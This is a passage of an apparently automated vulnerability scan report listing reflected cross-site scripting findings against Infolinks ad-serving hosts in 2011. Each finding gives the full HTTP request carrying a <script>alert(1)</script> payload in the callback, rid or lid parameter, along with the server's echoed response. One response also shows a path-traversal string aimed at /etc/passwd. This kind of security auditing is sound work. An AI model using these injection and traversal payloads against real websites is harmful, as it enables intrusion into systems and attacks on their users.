GET /gsd/1316238747946.0?callback=INFOLINKS.gsdCallback6a0db<script>alert(1)</script>537547a0793&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F16%2Fexclusive-melissa-rivers-splits-with-boyfriend%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/16/exclusive-melissa-rivers-splits-with-boyfriend/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=0
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:51:05 GMT
Connection: close
INFOLINKS.gsdCallback6a0db<script>alert(1)</script>537547a0793({rid:'37868f9f-f929-4208-ad72-c0399ed20ffc',rs:'rt1303.infolinks.com',makey:'4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4e494648484a4d5169767f7e',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.155. http://router.infolinks.com/gsd/1316238789101.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316238789101.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload f71aa<script>alert(1)</script>a749c541a4 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238789101.0?callback=INFOLINKS.gsdCallbackf71aa<script>alert(1)</script>a749c541a4&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2Fnews%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/news/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=1
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 262
Date: Sat, 17 Sep 2011 00:51:47 GMT
Connection: close
INFOLINKS.gsdCallbackf71aa<script>alert(1)</script>a749c541a4({rid:'9ec68ba8-daa0-4f64-9dfd-e1b4fcda2b2c',rs:'rt1302.infolinks.com',makey:'1316081415081714150817161009171517101414161e14111310150969707372',ms:'1305',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.156. http://router.infolinks.com/gsd/1316238970770.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316238970770.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 6d7c0<script>alert(1)</script>807ea01e6bb was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316238970770.0?callback=INFOLINKS.gsdCallback6d7c0<script>alert(1)</script>807ea01e6bb&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fnancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/nancy-grace-dancing-tmz-live-video-partner-tristan-macmanus-dancing-with-the-stars/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=2
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 262
Date: Sat, 17 Sep 2011 00:57:36 GMT
Connection: close
INFOLINKS.gsdCallback6d7c0<script>alert(1)</script>807ea01e6bb({rid:'e41c5bc1-607e-4eff-9b5c-ebf6875eb0e8',rs:'rt1803.infolinks.com',makey:'4346584445584744455847464059474547404444474741414747475969747674',ms:'1704',scl:true,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.157. http://router.infolinks.com/gsd/1316239040251.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316239040251.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ff2bd<script>alert(1)</script>2eed346dbcf was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239040251.0?callback=INFOLINKS.gsdCallbackff2bd<script>alert(1)</script>2eed346dbcf&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F15%2Fmichaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc%2F%3Fadid%3Dhero3&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 00:59:12 GMT
Connection: close
INFOLINKS.gsdCallbackff2bd<script>alert(1)</script>2eed346dbcf({rid:'6a030d7f-3ffa-45f9-b35d-d05a342d0f11',rs:'rt1302.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242414247424442445f6974737f',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.158. http://router.infolinks.com/gsd/1316239125269.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316239125269.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload c225d<script>alert(1)</script>c979af99300 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239125269.0?callback=INFOLINKS.gsdCallbackc225d<script>alert(1)</script>c979af99300&pid=159065&wsid=0&pdom=www.tmz.com&purl=http%3A%2F%2Fwww.tmz.com%2F2011%2F09%2F16%2Fjustin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone%2F%3Fadid%3Dhero1&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/16/justin-timberlake-not-my-penis-mila-kunis-texts-hacked-hacker-laying-in-bed-wearing-panties-on-head-leaked-pictures-explicit-cell-phone/?adid=hero1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:01:43 GMT
Connection: close
INFOLINKS.gsdCallbackc225d<script>alert(1)</script>c979af99300({rid:'bc3821af-c889-497d-ad21-4b884080eee9',rs:'rt1901.infolinks.com',makey:'47425c40415c4340415c4342445d434143444040434640414145475d69737275',ms:'1805',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.159. http://router.infolinks.com/gsd/1316239185968.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316239185968.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload ef5a2<script>alert(1)</script>62d6a50225d was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239185968.0?callback=INFOLINKS.gsdCallbackef5a2<script>alert(1)</script>62d6a50225d&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2Fcategory%2Fceleb-couples%2F&jsv=222.0.4 HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/category/celeb-couples/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=5
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:08:15 GMT
Connection: close
INFOLINKS.gsdCallbackef5a2<script>alert(1)</script>62d6a50225d({rid:'fbcb16da-871a-4353-9f5b-374c34a2c8b3',rs:'rt1802.infolinks.com',makey:'45405e42435e4142435e4140465f414341464242414841454942495f6974747e',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.160. http://router.infolinks.com/gsd/1316239193603.0 [callback parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://router.infolinks.com |
| Path: |
/gsd/1316239193603.0 |
Issue detail
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload fe53e<script>alert(1)</script>cbd73a72ca0 was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /gsd/1316239193603.0?callback=INFOLINKS.gsdCallbackfe53e<script>alert(1)</script>cbd73a72ca0&pid=159065&wsid=1&pdom=www.toofab.com&purl=http%3A%2F%2Fwww.toofab.com%2F2011%2F09%2F15%2Fashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos%2F&jsv=221.3.5b HTTP/1.1
Host: router.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.toofab.com/2011/09/15/ashlee-simpson-vincent-piazza-boardwalk-empire-premiere-photos/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=6
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: max-age=0
Content-Type: text/javascript;charset=UTF-8
Content-Length: 263
Date: Sat, 17 Sep 2011 01:08:47 GMT
Connection: close
INFOLINKS.gsdCallbackfe53e<script>alert(1)</script>cbd73a72ca0({rid:'db5a6b31-44ef-4f3c-ad65-34708253120a',rs:'rt1902.infolinks.com',makey:'47425c40415c4340415c4342445d434143444040434a464a42434b5d69747274',ms:'1704',scl:false,wd:{drm:'POST',ha:{cls:['post']}}} ); |
4.161. http://rt1302.infolinks.com/action/doq.htm [rid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://rt1302.infolinks.com |
| Path: |
/action/doq.htm |
Issue detail
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload 73873<script>alert(1)</script>96519b5c9d9 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
POST /action/doq.htm?pcode=utf-8&r=1316239041277.1 HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://resources.infolinks.com/flash/ic4.swf
Content-Length: 9824
Origin: http://www.tmz.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
content-type: application/x-www-form-urlencoded;charset=utf-8
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=3
makey=4b4e504c4d504f4c4d504f4e48514f4d4f484c4c4f4e494b49464d51697f7277&pimgs=justin%20timberlake%7Cnot%20my%20penis%21%7Cron%20artest%7Cname%20change%20official%7Csay%20hello%20to%20world%20peace%7Cmi
...[SNIP]...
cy%7Cterms%20of%20use%7Cadvertising%20inquiries%7Cmedia%20inquiries%7Chpmg%20news%7Cvenue%20name%7Creview%7Cwebsite%7Cdirections%7Cmore&jsv=222%2E0%2E4&rid=da106062%2D18d8%2D449e%2D805a%2Dc1785d15d58b73873<script>alert(1)</script>96519b5c9d9&crtw=0&by=f&crtss=30&phdrs=%7Creader%20comments%7Cthe%20laundry%20list%7Ctmz%20sports%7Cbeauty%7Ctmz%20on%20tv%7Cfeatured%20in%20exclusive%7Cexclusive%20must%20reads%7Ctoo%20fab%21%7Chot%20photo%20ga
...[SNIP]...
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cuid="8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec"; Version=1; Domain=infolinks.com; Max-Age=2147483647; Expires=Thu, 05-Oct-2079 04:14:37 GMT; Path=/
Set-Cookie: cnoi=74; Domain=infolinks.com; Expires=Thu, 05-Oct-2079 04:14:37 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 2302
Date: Sat, 17 Sep 2011 01:00:30 GMT
Connection: close
data=({rid:'da106062-18d8-449e-805a-c1785d15d58b73873<script>alert(1)</script>96519b5c9d9',fuid:'8d0d791e-8b09-4efc-b8c1-f2d069d5fcec../../../../../../../../etc/passwd%008d0d791e-8b09-4efc-b8c1-f2d069d5fcec',sentences:{'things':{auth:{ssd:'UPwq7UoNKadKvvbzD00CNRdwrWSPYZs_PO3spp54Imzon1y1ud
...[SNIP]...
|
4.162. http://rt1302.infolinks.com/action/getads.htm [lid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://rt1302.infolinks.com |
| Path: |
/action/getads.htm |
Issue detail
The value of the lid request parameter is copied into the HTML document as plain text between tags. The payload 67fef<script>alert(1)</script>6a7e468dd77 was submitted in the lid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /action/getads.htm?lid=267fef<script>alert(1)</script>6a7e468dd77&rid=da106062-18d8-449e-805a-c1785d15d58b&jsv=222.0.4&rts=1316239066211&bdc=1&cfv=10.3&prod_t=intext&sdata=make%20a%20move&ssd=2hAWURkIJ_4Kds6UXz8WznN_QzZNa4LBfSz7zrBLnZj6T2tXKUdAdSXXIuL_seS2dbU_ZFCbwoh9YlYKCjDYoQOhoiVPotApHz37yLFQrUZBj7NspVySPoNBTt03nMBOTHL4pxnayBF8i9niJ3xJY-bKwwT5OoYGYMJdaBrlT64ForO97xbWXA&sk=70&cs=9XaOKKLdbnq0zTFAwKWvjw HTTP/1.1
Host: rt1302.infolinks.com
Proxy-Connection: keep-alive
Referer: http://www.tmz.com/2011/09/15/michaele-salahi-journey-neal-schon-affair-years-in-the-making-tareq-cheating-marriage-white-house-crashers-real-housewives-of-dc/?adid=hero3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: cuid=8d0d791e-8b09-4efc-b8c1-f2d069d5fcec; cnoi=4
|
Response
HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Cache-Control: no-cache
Cache-Control: no-store
Set-Cookie: cpc=100; Domain=infolinks.com; Expires=Sat, 17-Sep-2011 01:59:51 GMT; Path=/
P3P: CP="NON DSP NID OUR COR"
Content-Type: text/html;charset=utf-8
Content-Language: en-US
Content-Length: 846
Date: Sat, 17 Sep 2011 00:59:50 GMT
Connection: close
INFOLINKS.setAdData( {
lid : "267fef<script>alert(1)</script>6a7e468dd77",sentence : "make+a+move",
width : 0,height : 0,ads : [
{
template : 'text',
title : 'Mover',
text : 'Compare Top-Rated Mover In Your Area. Get
...[SNIP]...
|
4.163. http://rt1701.infolinks.com/action/doq.htm [rid parameter]
previous
next
Summary
| Severity: |
High |
| Confidence: |
Certain |
| Host: |
http://rt1701.infolinks.com |
| Path: |
/action/doq.htm |
Issue detail
The value of the rid request parameter is copied into the HTML document as plain text between tags. The payload b1512<script>alert(1)</script>2de489fe3894dc8d1 was submitted in the rid parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.
Request
| GET /action/doq.htm?pcode=utf-8&r=1316238789823.1&purl=http%3A%2F%2Fwww%2Etoofab%2Ecom%2Fnews%2F&makey=47425c40415c4340415c4342445d434143444040424a40464147405d69737677&ref=www%2Etoofab%2Ecom%2F2011%2F09%2F16%2Fexclusive%2Dmelissa%2Drivers%2Dsplits%2Dwith%2Dboyfriend%2F&ptitle=hollywood%20news%2Cred%20carpet%20fashion%20and%20celebrity%20hairstyles%20%7C%20toofab%2Ccom&pid=159065&wsid=1&by=f&ptxt=latest%7Cnews%7Cmost%7Cread%7C%C2%A9%202011%20ehm%20productions%7Cinc%7Call%20rights%20reserved%7Creproduction%20in%20whole%20or%20in%20part%20without%20permission%20is%20prohibited%7Cin%20partnership%20with%20tmz%7Ccom%7C&jsv=222%2E0%2E4&page%5Fkeyw=hollywood%20news%2Cred%20carpet%20fashion%2Ccelebrity%20hairstyles%2Ccelebrity%20beauty%20buzz%2Ccelebrity%20gossip%2Cacademy%20awards%2Coscars%2Ccelebrity%20makeup%2Ccelebrity%20bikini%20bodies%2Ccelebrity%20style%2Ccelebrity%20dresses%2Ccelebrity%20jewelry%2Ccelebrity%20handbags&crtw=0&twnum=28&crtss=30&pdesc=get%20the%20latest%20celebrity%20gossip%2Chollywood%20news%2Ccovering%20red%20carpet%20fashion%20and%20events%2Ccelebrity%20hairstyles%20and%20celebrity%20beauty%20buzz%20at%20toofab%21&crt=0&pimgs=toofab%7Clove%20it%7Clive%20it%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7Ccelebs%20love%20camilla%20and%20marc%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7Cmark%20ballas%20and%20pia%20tosano%20split%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7Cnew%20york%20fashion%20week%20finale%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7Ctoday%27s%20celebrity%20birthdays%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7Chot%20shots%7Cseptember%2016%7C2011%7Cgeorge%20clooney%27s%20many%20former%20flames%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C2011%20emmy%20awards%7Cwho%20should%20win%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7Ctoofab&rts=1316238789824&csilv=4%2E0%2E60531%2E0&plinks=news%7Cphotos%7Cvideos%7Cceleb%20couples%7Cceleb%20kids%7Ctv%7Cmovies%7Cmusic%7Cfashion%20%26%20beauty%7C2011%20emmys%7Csign%20up%7Csign%20in%7Cthis%20week%27s%20hottest%20pics%7Cbabies%7Cboobs%20%26%20beyonce%21%7C1%20comment%7Ctoddlers%20%26%20tiaras%7Cstar%20goes%20wild%20on%20live%20tv%7C14%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Ctaylor%20lautner%20shows%20stubble%20at%7Cabduction%7Cpremiere%7C3%20comments%7Csnooki%20slams%20into%20italian%20cop%7Cwatch%20the%20accident%21%7C0%20comments%7Cjill%20zarin%7Cno%20pink%20slip%20for%7Creal%20housewives%7C13%20comments%7Cvictoria%20beckham%20%26%20baby%20harper%27s%20shopping%20spree%7C2%20comments%7Cbritney%20spears%20wears%20ring%20amid%20engagement%20rumors%7C8%20comments%7Ccelebs%20love%20camilla%20and%20marc%7C0%20comments%7Cjanuary%20jones%20gives%20birth%20to%20baby%20boy%7C0%20comments%7Cmark%20ballas%20and%20pia%20tosano%20split%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Chewitt%20holds%20hands%20with%20rumored%20bf%7Cwho%20is%20he%7C0%20comments%7Cnew%20york%20fashion%20week%20finale%7C1%20comment%7Cfall%20tv%20calendar%7Ca%20guide%20to%20new%20%26%20returning%20shows%7C0%20comments%7Cchmerkovskiy%20brothers%20face%2Doff%20for%20the%20first%20time%21%7C0%20comments%7Cworst%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7Ctoday%27s%20celebrity%20birthdays%7C0%20comments%7Csarah%20jessica%20parker%27s%20many%20premiere%20looks%7C0%20comments%7Cjane%20lynch%7Cwhat%20should%20she%20wear%20at%20the%20emmys%7C0%20comments%7Chot%20shots%7Cseptember%2016%7C2011%7C2%20comments%7Cgeorge%20clooney%27s%20many%20former%20flames%7C0%20comments%7Cemmy%20awards%7Cred%20carpet%20regulars%20through%20the%20years%7C0%20comments%7Cbest%20dressed%20stars%20of%20emmys%7Cpast%7C0%20comments%7C2011%20emmy%20awards%7Cwho%20should%20win%7C0%20comments%7Creport%7Cthree%20ny%7Chousewives%7Cget%20the%20boot%7C188%20comments%7Cnew%7Ctwo%20and%20a%20half%20men%7Copener%7Cashton%7Csings%7Ctheme%21%7C74%20comments%7Cexclusive%7Cmelissa%20rivers%20splits%20with%20boyfriend%7C43%20comments%7Cjustin%20bieber%27s%20surprising%20views%20on%20marriage%7C38%20comments%7Csnooki%20gets%20inked%7Csee%20her%20new%20tattoo%7C28%20comments%7Cevening%20quickies%7Cjessica%20simpson%27s |